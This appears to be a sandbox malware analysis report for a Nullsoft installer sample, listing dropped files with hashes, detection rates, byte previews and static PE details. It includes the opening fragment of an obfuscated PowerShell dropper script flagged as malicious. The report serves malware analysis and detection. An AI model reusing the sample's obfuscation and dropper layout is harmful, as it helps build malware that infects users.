SHA-256:	10459A628A6525C62CAF49A9572E7545EB8117CD370AC85EE15E9CB69C94D099
SHA-512:	96D5F686EEECAEF15B4A130D48EF22EF4E529048F944156E5B58434367AAC81B416BE57A053CB420CF1840E64745F2182F83695A6F43CEE9C6EF9EA14DE2611D
Malicious:	false
Reputation:	low
Preview:	[landingspladsens]..afholdsbevgelsers=jackie..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.838950934453595
Encrypted:	false
SSDEEP:	192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5:	4C24412D4F060F4632C0BD68CC9ECB54
SHA1:	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256:	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512:	6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nkcd1eg.nnq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdlbq1nd.n31.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.028908901377071
Encrypted:	false
SSDEEP:	96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN
MD5:	51E63A9C5D6D230EF1C421B2ECCD45DC
SHA1:	C499CDAD5C613D71ED3F7E93360F1BBC5748C45D
SHA-256:	CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
SHA-512:	C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....f.R...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	541940
Entropy (8bit):	7.255408214538733
Encrypted:	false
SSDEEP:	12288:ZCcSi5DOVYoesQTkvn50uFD4SylLXueay:ZoigJvpaLXu6
MD5:	D32A9F003D7D44F7839D1E73AB0880DC
SHA1:	600DA56EFCBE1F1ECFBF984B6F7F1103E067E43D
SHA-256:	6827F81B3ADD0570684D911484C7C3A75F4D565123261D4173306AB35E998494
SHA-512:	3793E6E86CB401BC0476F498A75222672753C89B18B1895E800C918D4C64D2D2247370BFA954BA4D3653FC088D864E4A829D0154B6D0444D3D61B9E66A9C5168
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50% Antivirus: Virustotal, Detection: 60%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x......z...x..........i...,"..t.......y...Richx...........................PE..L....f.R.................\....9......0.......p....@...........................?..............................................s........=.`............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata....... :..........................rsrc...`.....=......v..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\opbruger.clu

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	2160
Entropy (8bit):	4.902473003797256
Encrypted:	false
SSDEEP:	48:1uJmHFpIJRXHVx//A6bt0ac2KXiWYOYsa2Qu6L:1YYvIvHnoYZmXFYOdRQN
MD5:	82F31CD0D6B535AB5B97DBD6DC66F053
SHA1:	E004C4D80E2B59D4EA587E61BC2C46F15AE60E90
SHA-256:	E5927377ED6153A802588AF6F771651A95997E346BACEC85DE7F51FACC9EC398
SHA-512:	D9B69A12F2CFC542189548C2B26630691B2CD52964750DA598F5D5DD1DA479EDCD50C33700B7FC27A8D8C1C35F5CF24EDBBF629C85693563EE7AA55F9063C8B3
Malicious:	false
Preview:	....*..k.....a...7.................of...7.)...Y..f&xf.......#..@...x....\<y'....................../r.......F.x#........X.\.......r....@.7p...E.....5...:7N.......~.{....k./..........-.Y^..P.....p.g...o0....................1.q...o.?...............:.....$..'Z........i71.q.......f...B..R.....<x...hg..h...$......................Q...>............\..E....R[.......L.x.?..6............5Q...m....4.t.................V.....!.2.<I............g.a.................6............Q................a....4........:.....Wo..).&............................x8....t....................R..R...{....s..............B.............X-..D............4.C.............b......V\....\|.......G......F.............D;....o....`.....................K..'....................... ........S.(.)..j.#......x...D...../..j...............6.S...E....a...../..,.../.Q...?...-9.L.........\|..5.I.o...ns...........4..k.I.........`.........6.P.4................z..v.............I.......zY............A.......$........PA..........?......

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\tinfoil.uln

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	3545
Entropy (8bit):	5.02196585717849
Encrypted:	false
SSDEEP:	96:JLYJNHphI9v0S69SFej92ji58zEsZIEs1idNL:JoN/I9vj6kFexT5ZsZID1idNL
MD5:	DF5235024046E6C0CB7A97DAEE203137
SHA1:	4B88C8EE5155844F71C1DD2FF91DC3A0E6FFD1CC
SHA-256:	9E492FD0582D44036F501714E191CECB6412B941AF944AD626C474A71868ED4F
SHA-512:	DD8E7BB4DA6FA0C8A74499E5F9408A07C82491458868DC46027BB1A0DB3594741BAA827FCE607CF50F8D579FCE895A86B14464CA9E7A7CB1B914EF2E068E779F
Malicious:	false
Preview:	R7....;wD........V,...e..i.....B............^.. ......S...........k..}..M...T........B.Me.........$6w...............~..S.....E........N.....K.......j.D...NK.L...`.&...............................8.......L%a.~..y7.....@................,.#....`..T&d........\........(-.......V...G)......B.#........^..Z..i...[.......-i&...O..]..e......J...].....$..b..H...@).[..."....q..................J.qsh..;................B............f.e.....(s..................p......O......0............x.c......n.".........q....X..........qX".......N2-.....,.....{....G.v...'..F..P..................]C..b...........L9.k........~.....................'d...Y...U....S.............+./.".......Q(i.)................ ...........O..A..s.1......3....(.E........9....\..!y..3.......................$o..[.RD..=!...9.....E.......p......"......m..-.T........7...............Z.:.p.....NeN.M.....*.................A.......j.......>............p....$3@...........r.?......C.o.a...2..+J..../....G..F............4.r....i...

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\ugredes.txt

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	ASCII text, with very long lines (341), with no line terminators
Category:	dropped
Size (bytes):	341
Entropy (8bit):	4.267705255463881
Encrypted:	false
SSDEEP:	6:QEGl0O0NpUTbu2g6eiaTnmU0HiWrC+swvigPxMkwFqK6az8fwn:QtlN0AbZeZnCHPC+sYVxMBqKufwn
MD5:	21247A740195BC7EB31C1F4F8D74F105
SHA1:	B5901B2A3DB33BED62BFEF39628AFDFD8DA5B64B
SHA-256:	6AD50BBFB7F9FF7C19ACB96D70BE6E0B7639319406B1651B8D211C25A035014A
SHA-512:	BDBE2417B06765DA05797AF5EEB653D551620E99A78BB73C4FDEDC226842DA0394F9D680917A67FE53293040DADE85FD5A4FD5B506D202FAECE64C2ED9897DE6
Malicious:	false
Preview:	wronskideterminant binges sjettedelenes butiksuniformen unmoralize.moere broadways visionres wordlike koloritter.fortjenstmedaljerne dominoes effektuering trombidiidae yamsens interspersed,senectude magnanimousnesses prefectship.blddelens angelicize habsburgers mythification suppeterrinerne.kukang pottering janes forpanthaver byldemoderne,

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\yderligheders.arc

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	2363
Entropy (8bit):	4.880432971620656
Encrypted:	false
SSDEEP:	48:kz6ZGKwmbaEuLcmEnLoUKRkmdugFg912JGoMifalyp:kQwFLTt6gFgz5oMe
MD5:	41EEC4BCFD87765E5FA0001DF5F805D5
SHA1:	AC9725D370D1C7102110A4C88875589E18E336ED
SHA-256:	E0D482650548479E0842A3F3E667E847C926D944A28A48FC50498B95C270579D
SHA-512:	1A103D697884E45B76C242D10C28C14C8254F19E799342B923273DE3D27654B282FB54C50897F5A5DBA41C90C3D303A629F558959A2E0A6C02D6BD2D5649A8BB
Malicious:	false
Preview:	....f...\|.?-.............~........,..........,.................d.................[.`.r.....O..l...}........5.A..G......S.............$.....j.....i.S........E....Y.7..6......................V....4k.......7..S..Qo...b......j...3h...#.Ot.}..............bW.(.....j....................)..3..=g...Z.........V...R........\|..........J....................t...........~....).....0.......2.......F.o..n8........._hRY.,.....p.....N.+..m.........i.......`...........n....k...."...Q...t........Y&......h................m.-.........p@.........~c.._. ......a.....I.............x..+.;.....G...#........`.....v.v.....V4....M...a.pbe.....A.J...$.....@..........c.Ch...V..................p........c.Q..........i.'..m.......b:.....I.q.=.h....S..D........D...P.............#..m............P..............r.g...{.X.M....n].g............./....L..t....P..y..........8...^qk........5..M.6...M.....x4........q.+......9..../f............yK...A......L...T..hrR.Sb...............!......w....,0.....+.......u)...{.

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\afgiftsforhjelse.unr

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	4858
Entropy (8bit):	4.918988982841542
Encrypted:	false
SSDEEP:	96:k/sDDuXTgoIanyWV1wKAx1nbl47watBNtOeLZ+GQW:k/JTgoIYDYtx1nbW7wsNs80GQW
MD5:	B0F3BC33AB7D2AFB0982AE05CA44EA4E
SHA1:	0C14265BC0B78CD9C0B446D29BA8B993B205A861
SHA-256:	FAA4107D490C53F4B841B1F485A756C2172A289564A293478C361EEECD68157B
SHA-512:	6FEBE8C7132AC97CF982565A6DA9517981FDAD3FF9AB91817A1DC81086822EDC7EE7DC9868E1AAC1B465B7B0695D8758E89E2AE976FE39F5A054D88F48B91BC5
Malicious:	false
Preview:	......,...\)...u.......p\.........3.s..Q......1........a......o......U.......q."HZ...$....................w_..g............[.)....................8.....I.I....I....#.[.U.........uy.......X(...Q(........\...)"....\|..G.....<...V.....<.......d.In.~3.v..........!.I...............R2....L....V............@.. .....X...(........n.6..............................4....&A./..3....<....{.DC.oY........<..."..u.6..........;........ G............C...-........,..............f.s....Q....................[z.\|.N..........~.O........^......Oi=....."...............i.0...........\|\..E.........Y......(.......i..........'R.\Q..P.g..:...#........t.e%...X........!......m.oN.........}......_`................u....................N..AN........................x.?.E......{..........d.....T.....}......$aO.........h.$...?u...z.....9...........r.............H.M...#..8..........5....!......n..8....o..VQ.....D..A......"......NK.............#..........Z..D.EE....Gf..4i8...........Q?.......@..........IP.......%..._

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\antifrictional.bel

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	4816
Entropy (8bit):	4.915230588207364
Encrypted:	false
SSDEEP:	96:1UNXly9/zbH6zZQfoH3iAXMZxGWc1F3Yy+W8QLG:y+r6lQfLZpWhG
MD5:	5D8E518E1337927C154B4EF79C0CFB7F
SHA1:	707F5BB55D5E0265AF5E19AF25B21395D7451371
SHA-256:	04D8425D4BE11FC0B4085E55AD047B8797C8EA69D252DEF7D99C55AF4B51189D
SHA-512:	9D7C0063FE23EC991B17BF6DE431F8E5C8E4449B46AA343826C7589249ECCB426F409DFE6DE0C6F16CD56662B6F408811C8EEAB8F2B157447355AE0C4AA816D7
Malicious:	false
Preview:	..FF...b).........'..............w........[.....\......7FP.............7......l...........7 a...6....W.......u........u...Z..7.....b.c....:.....j......W......X.S....JXO.k...........:....'......~...'H...^..............1...>.S...C..6....u....D!..:.5....%..................a.r...m/1..........{...........7......(.).+.p..S.#.....g.....'.y..B........5......H..\..........h.......a...Q0Y..Y..c".(..............C...........c6.k)..".7.....:....y.n..+.......HL...y.....[]...x.XO....,..............6D...<..........\|.=...u...............~........'`.F.....]....O....e.E.}...=.....J..............h..C..0.o............B........x.j.............%{.................n....U.K...'.......X...!........n.....?.......Z.......W\|U..}..c...A{..Vk..........2...../..................K...6yY..e...9......gc'.................c.g.....^.......q.....~.............../.........[..bh.....o.....j.3.?..+..&.....p..........}..........R..a......%...`(...V..\|.v......Z.z.D@..............................<.~.....Z.j..y......

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\cumins.fed

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	2090
Entropy (8bit):	4.843388708041974
Encrypted:	false
SSDEEP:	48:Jp+nElY8Qco7YBAQvfD1edI11QMxMn2j22cG4g5W6xE87Iw1B:DsElY8QI9fD1e+zMYxnlEkIKB
MD5:	EACD68C6594CD3E229FD48EECC8895AD
SHA1:	ABBCCAAD9DAE827E74817BDEE23839F76411165D
SHA-256:	B6D946C02F0062BE90C05E3B2858014428D866E12390902BAC6E5F69016B5C80
SHA-512:	9BC74B3F2DEB9095623F92E3D02F47843C32350669EF91FBB885575C7363EDBC21374176855AB133F267D6A1BB27F5FF540220970996A746D6121ADF6B6DBD1F
Malicious:	false
Preview:	........y@.....}..._.!...;....................... .......C.>2;F.....U..L.M.&.....r.%0...............p..$.N....i.....".....1...A......;..........$.....d......17t.n...........\|........#v.E....o......!..Rh.Wy9....SG.......2...........8G.....0.....B.....B.D..u..&.....2........p{.'.....C......F_.........$..h......7.P@...3.....f.L.;...................\|.....}..R.-....{...X.........(..7....@..........~"26........!....!......................f.........w....F......I....s...(.....Z_.._..{........{-..Q..........w.D.c...`...."Bo......4......`......g.....1.....y.+Q.4...z............$.......\...0................L.=....{z...Z............`.._........4...................K.?)..a...6.............C........................L....,.....\...O..... K........A......\R............v.......&.......v..a..H...#.......&................s.......N.,.[N:............h\....(...7)...d......&..u..A.....-..M...<..........j....(.d.....~............./...N......_...Te..........`........15..@....3...........Lr.c.......

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	ASCII text, with very long lines (60717), with no line terminators
Category:	dropped
Size (bytes):	60717
Entropy (8bit):	5.315564825748992
Encrypted:	false
SSDEEP:	1536:baLKorPkNaUItZcwkrAzniGxNICRMpvxHbGpakSAoMSIcAN:bpojkNYZcqniGxRRu57ESAoMSIc4
MD5:	2642C08B375F71FA0A3967E43B86D22F
SHA1:	468E42455AD0C908FC8F09EB618E0746CAA14076
SHA-256:	946CDD50696211D8AEC7E85712D80DF76CF68A87BD34A4718776BF325A3E6259
SHA-512:	9FFDE610D65E8313A4CAAC5F2D514E065352D55B9CE8519021EFF60DCB6E1297134222E1B8B478E2CE1D8DA32F3D96EBA08DABC564406EDF8A03C8A1CE088F88
Malicious:	true
Preview:	$Unfurredlpeblomst=$Fasciae;<#Pincpinc Unmeltable Skilsmissens Fleuronnee Platformally #><#sikkerhedsmargenernes Unsay Bortlbnes Nonsufferance paleal #><#Overbleach Ungirds terningkastets Fugtighedsmaalernes #><#Spahi ulrikke Biniodide Retell Bedriftsvrnet #><#Canoed Frsteviolinens Jordemodertaskernes #><#Kammerherreindernes Britzkas Tekstureredes Peeseweep Bindeblter #><#hydroid Poloists Livelihead Semidole #><#Mechanician ahorn Brevskolen Orpiment echelons #><#Korallernes Bastonet Citar Longan #><#Beskaffenheders Bilaterality Besvarer unconcurrent Hvalpene Fattigst Regretful #><#Pyroxonium Dodoism Standpladsers madende Daghjemmene Medias Physiognomonically #><#Ustyrlige Livetrapping Naturligste Indtrykkende #><#Graveyard Quantummechanic Bltedyrs Civiletats Styrian #><#Ergotamine Kaffebords Fiendfully Hegari Agoranomus #><#Pdagogikummet Undervisningsaktiviteten Fjortenaarsfdselsdagen Nedjas subtotalling Afstningsmuligheder Softicene #><#landage Indlemmelsernes kkkenmaskines Pregather

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Conjecturing\Coaling\dekomponerer.for

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	3098
Entropy (8bit):	4.763220624644375
Encrypted:	false
SSDEEP:	96:wBFcrXFpnQxIcWA5Ep8IF3VlJqOTWebR72TT:wzcjX+IcWAeejebAn
MD5:	90D5500FD9A1E8CD244A0EF826F8E16B
SHA1:	E3A7BBF061DAA7C0F656DA2ED85A60B7ABF93884
SHA-256:	44801D328B78665F7E98D921A83EDC0F28AF8ACFB4D061D4B3CD9D4D7D5EA6DA
SHA-512:	82E3EAB19389004D33F79267CAF32F02C8B3432F035A4F784861F2A70D6DCBED96FA61A8FABD14D2FDFA76C169F888D5D0A1469EE78F435265252893C7044D63
Malicious:	false
Preview:	....L(.......rr......{G....A..M...1.........,.........P?..~^........4.;F....'....(.....M+.[L8fX....a.K....-.1.D..B..@....................'.8...~.Q...x..{h........G...P!\...........zu&...S..........Mh..B...........Gf...:..'C.....6...D..........K....D.w......N..........#S...I..f..............a......8.3.......\|K.@..H...1........d.85..............=.....O.....jn.....!....R.......]Sg......,..................A...................I....2<............[......a.<....&..H...........k?.a...5....s.,.....qVA....................8...\|...K..?....W......;.......G.....Ge....M.?..q......U...........Sk5..........l..C.....U.r..............{................AkN....i.......#..S.................5&...............9`..}............x.......u6. ..w....[...DH........D...........&..6.`..>.......G.....P.......G........h.6.c......B.........)_.wA.i.G.M...<.q......<....FU.W..hM.......".........................X......'..c....X....x.D....@..............v..&...K..8T.....-.e+.?...].!.......VY...x...X.............!...b!..

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Conjecturing\Coaling\gaapaahumr.vri

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	4382
Entropy (8bit):	4.8488270107016165
Encrypted:	false
SSDEEP:	96:a9BRgM0CCjgCND3bGlKBCTkrLCzTKqufKZgyS:a9B30C3eLGlKBRrLCzkIg9
MD5:	DCEFE44C6E845F4B965B6AC480EA8493
SHA1:	5ABE85AFA00FA79B49E59C1048A970D317EF8C12
SHA-256:	0D849177F3A31AB156F09015FAE531A24D1FF703115A41F66111C7E65473BCF0
SHA-512:	7E9AF5B880C29187F9594E1D5EBC917B365FC3DFDED142EE8351AE55B32044F823E61CF0BAE4C60D4F3EC64B73BA657BE91EA417C1F50B2B86E162772062C715
Malicious:	false
Preview:	...s.J..`......p......:.].a........C...........................?......:....c.........4....H...............................8h........8...d..1'......Db...j+...g...................J..........a.......=..nx....d.b..................C$.............?.j.....L....?............$...r...[.....v.........._.......w....p..IL......z.....y.i......i.................&.e+........\|........B............?;....o...........y.U.......2.............v...........X..\..4..w..3...........................&...,...v.....E...Q.[...........S...]..k.......~........x.....M&l..k....fy.....7..i.........G3.........2.......,....0~.....X....j!..........\|.M..@.W..u....{.D.I....................5...pQ....d.......................F..QF.X...z...........p......)_......7........j..............j....aXi....._.7.j..n."S....."v....Y...FI.....ON.............$.......u2.....+...h....).......................%..........p..................$.w..D............{.7C......Y..8..E............'................ a....m..L.....8.......n..........

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Kreditnotaen\Halibut.tru

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	3302
Entropy (8bit):	4.7925418136890565
Encrypted:	false
SSDEEP:	96:iKd7XjLyIxJOrIBX8S0VpHQfRsQZ9U4Bsp:dd7zLyio8s5OfRrZZk
MD5:	E42C18706F54BD001DF7FC27471F1BA9
SHA1:	5ABBD3BC858664692E7853E3ECCD484480BC6BC4
SHA-256:	DE703080CBE33802C89FAF856FD8FB26AA1726902F35182748D048761FC8A8DF
SHA-512:	2601D2E170697B81B55DCDF25C9E083D90B5F9A3C6B5F48F3A6363F61F07E073F56D2BF2C17A0607FC9C314B75EC06FBBC393A2B0691D6958497B5401E2CCE33
Malicious:	false
Preview:	..Z................K............r......Z.......... .,....X...!........Q.%....+.........\|...P....Y....?..................~.9]e.....;:..e.........i..7..........n.........,....Z..............E.....v.................\|.....).h...;.)Ox..............S.W.........<......?................T..............p...................&.6........E.#..<...l........%;.................).,....\.....-..z5.j.....0>.............g.....#_.k...v.A...........J.'...p............J...<..o......l.%........g.....I....P...........h............IE............w..j;.........&....C...............y...9..d.........s...'...X..[.b......I.7..Ph.......&.........x.........-.,................?......:.=S%..x..z.............:...B.......M.........)%..N....G..A.;.w.3f.<..G..........q.......Q^.#.../...e....s$,._..........'.....K.Y.h.........6.:..........0.&T...........f..................?..~...Z...........{.6..0l...........2U./6......c....R.........Z...........Q......v...................^....O....................)*`............U..

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Steenbock.Pro

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	305790
Entropy (8bit):	7.775164677035444
Encrypted:	false
SSDEEP:	6144:PdH6iMiLnFvTgfOFbGR2krS031S3Wo+IdaJzau:PEiMiLgfOFbE28S0l1odd2zau
MD5:	3C1A6DBA2BC33FE7B2D3462E6681D183
SHA1:	E99C68026794261FAC905CE3C5F569C4A483356E
SHA-256:	A1470809C41E9769079AD29EDDD10A22E1311A6B7B5BC9DE86E5D35DED273A50
SHA-512:	16F808C0E775915ED32D636342579DD77F3282CF66B1421D09845E8CB56099D6A03E2A08247397A90F1D5113BCD9217782C819E0209E4DD8E9E641ABE9DD930A
Malicious:	false
Preview:	....................................;................3.............vvv................###.......................s.................jjj..................h........;..aaa.........n....................5............:..6...........9.(......................."""".......****....kk....q....$$.88...ggg.ww..............''........jjj....\|\|.GG......WW.........D..........H..............888...............................[...99..w.....>.&&...~~~.1.............................E..................AA.....33.u.................a.v..........)...v...##........................M............................................................................!!!.;;;;;;......ggggg...........L..;;;........................DD..........R...&.jj...................... ...........@@@@.K.......&.................lll.##.................qqqq...........;;;;;;...............................aa......H...........___............................D...................0.....rr....C........<<<<<.........................K...............>..=.

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\slutvrdi\Byssiferous\inamissibleness\Wirens12\muldnede.paa

Download File

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	data
Category:	dropped
Size (bytes):	4503
Entropy (8bit):	4.856546115446936
Encrypted:	false
SSDEEP:	96:PsJ8F2sos+o7JDTkEDr4QS85Qo7ZyfMPEKEg5v5:nHnjZr4QSPo7ZyfSEs
MD5:	AE173E15EE02CE34F6EA3295E80EB6CE
SHA1:	460D7D4B09231CC06256016ADC6FA126113008AD
SHA-256:	E8661DE319400532CCAD06E3849F4752EF88AC167D0F9FF0681F65EE4CB51C63
SHA-512:	A707BF1A5E3580BEE56B154F79A38FD9B6B4B48A0950903E5B72A13DA9A22DBA6D071AF44668FE275072A469A4F2B2F1857D0817BC0F13A3FBFEFA0D918E72B3
Malicious:	false
Preview:	G....MM........&....W.Qs..y...../.....E;........B.....g.6.YvM...............c......F........O..b.............3...................3 .............Q........r..t...............7..i.F.........,......Z........N........................&.t#........3..m.........SB...4............."......d............G1I........1.....K....2.^.....(...f......+.W./...~...{..........{......\|...8..T....7...Li....H6c...........1..O..5..j..]........x........l.X..*............+....j..>.)..?.B......1...................y..G...............eO...f........S...i....e../..@F...H........2..i........$......N.US....Y.ti...............>..&........X.....OQ...k..s......]............V...6......!......."................A.........F;^>....).4...G.S...................n..........>(@......`......t...f:...l.9.......{..~........?$..............7....cCd..u.X........)G.r........z.........,....2...)..z.Uy[..A...&...n..w....p........................P......?.....S.........q......_.Q.@......O.G..>..-.!...C.i....lr....F.:...8..9......f.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.255408214538733
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hnTW5HdWvY.exe
File size:	541'940 bytes
MD5:	d32a9f003d7d44f7839d1e73ab0880dc
SHA1:	600da56efcbe1f1ecfbf984b6f7f1103e067e43d
SHA256:	6827f81b3add0570684d911484c7c3a75f4d565123261d4173306ab35e998494
SHA512:	3793e6e86cb401bc0476f498a75222672753c89b18b1895e800c918d4c64d2d2247370bfa954ba4d3653fc088d864e4a829d0154b6d0444d3d61b9e66a9c5168
SSDEEP:	12288:ZCcSi5DOVYoesQTkvn50uFD4SylLXueay:ZoigJvpaLXu6
TLSH:	A6B4C0E1B38188CAF8A766764C2FD93021B35DBDC491560F71EA7B259DF3352009BA4B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L....f.R.................\....9....

File Icon


Icon Hash:	39785c7efefefaf8

Static PE Info

General

Entrypoint:	0x4030cb
Entrypoint Section:	.text
Digitally signed:	false
